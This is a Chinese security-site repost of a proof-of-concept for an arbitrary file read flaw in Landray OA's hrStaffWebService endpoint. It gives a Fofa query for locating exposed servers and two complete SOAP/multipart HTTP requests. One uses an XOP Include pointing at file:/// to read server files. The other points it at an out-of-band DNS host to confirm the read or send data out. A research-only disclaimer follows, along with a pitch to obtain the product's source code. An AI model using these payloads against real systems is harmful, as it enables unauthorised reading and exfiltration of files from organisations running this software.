蓝凌OA hrStaffWebService 存在任意文件读取漏洞 PoC

admin 2024年11月10日18:49:14评论74 views字数 1851阅读6分10秒阅读模式
 

0x00 前言

蓝凌OA是一个数字办公平台,同步大中型组织智慧办公平台EKP,微服务架构,支持智能门户、智能搜索等新技术的快速接入,让平台持续升级更便捷。

Fofa指纹:app="Landray-OA系统"

蓝凌OA hrStaffWebService 存在任意文件读取漏洞 PoC蓝凌OA hrStaffWebService 存在任意文件读取漏洞 PoC

0x01 漏洞复现

Payload:

POST /sys/webservice/hrStaffWebService HTTP/1.1Host: Content-Type: multipart/related; boundary=----j0ofrwsv2dtllbzzkyh9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36Content-Length: 619Connection: close------j0ofrwsv2dtllbzzkyh9Content-Disposition: form-data; name="1"<soapenv:Envelope xmlns:soapenv="" xmlns:web="http://webservice.staff.hr.kmss.landray.com/"><soapenv:Header><soapenv:Body>    <web:getHrStaffElements>        <arg0>            <beginTimeStamp>1</beginTimeStamp>            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///"></xop:Include></count>        </arg0>    </web:getHrStaffElements></soapenv:Body></soapenv:Header></soapenv:Envelope>------j0ofrwsv2dtllbzzkyh9--

蓝凌OA hrStaffWebService 存在任意文件读取漏洞 PoC

Dns外带 Payload:

POST /sys/webservice/hrStaffWebService HTTP/1.1Host: Content-Type: multipart/related; boundary=----j0ofrwsv2dtllbzzkyh9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36Content-Length: 598Connection: closeSOAPAction: ""------j0ofrwsv2dtllbzzkyh9Content-Disposition: form-data; name="1"<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.staff.hr.kmss.landray.com/"><soapenv:Header><soapenv:Body>    <web:getHrStaffElements>        <arg0>            <beginTimeStamp>1</beginTimeStamp>            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="http://dns网址"></xop:Include></count>        </arg0>    </web:getHrStaffElements></soapenv:Body></soapenv:Header></soapenv:Envelope>------j0ofrwsv2dtllbzzkyh9--

0x02 源码下载

标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转

蓝凌OA源码关注公众号发送 241110 获取!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):蓝凌OA hrStaffWebService 存在任意文件读取漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月10日18:49:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   蓝凌OA hrStaffWebService 存在任意文件读取漏洞 PoChttps://cn-sec.com/archives/3379744.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息